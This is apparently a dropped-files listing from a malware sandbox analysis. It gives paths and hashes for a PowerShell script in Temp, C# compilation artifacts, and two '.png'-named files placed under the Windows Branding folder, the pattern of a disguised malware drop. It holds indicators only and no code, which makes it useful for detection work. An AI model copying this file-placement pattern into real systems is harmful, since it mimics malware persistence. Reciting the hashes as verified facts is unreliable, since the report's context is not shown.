  SHA512: 64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.cmdlineMD5
12ebeafbd27ff16af1c73abdc33a5dbf
SHA176f2ba1bd5ce9e2630b006c0630882e24a573a2c
SHA256f08243481e7712c4738e4a9aa6c27ddfe2b6a4e6af32d881312364094bc7ed15
SHA5124b6d6b7d6f74d70f48607e42a851691a1a404252cb399a2868f2f3416474d43c8b28cc721212eb469fa1a4b5e01b93787eb5c63fbb2640388d138a909283ebd6
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\CSC20A7C651A2C142128975A83FC589745C.TMPMD5
5554a7162d415b08511d40062476127d
SHA1c45c664e6c6bc8e21cbf7e97150d8f274027a2e1
SHA2565e4df79a3ce198ee96cf241615ad09adf55b318313a42dd58b0374096fd31273
SHA51297e7aa9bb8383a73399bb581b236fc4c1daea25b9ab8ed16e2cd2e6940ad5aa01937ec7619aa663023582a4bff94de44a11899c7e192d0f3456afbc6dc30cb6d
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-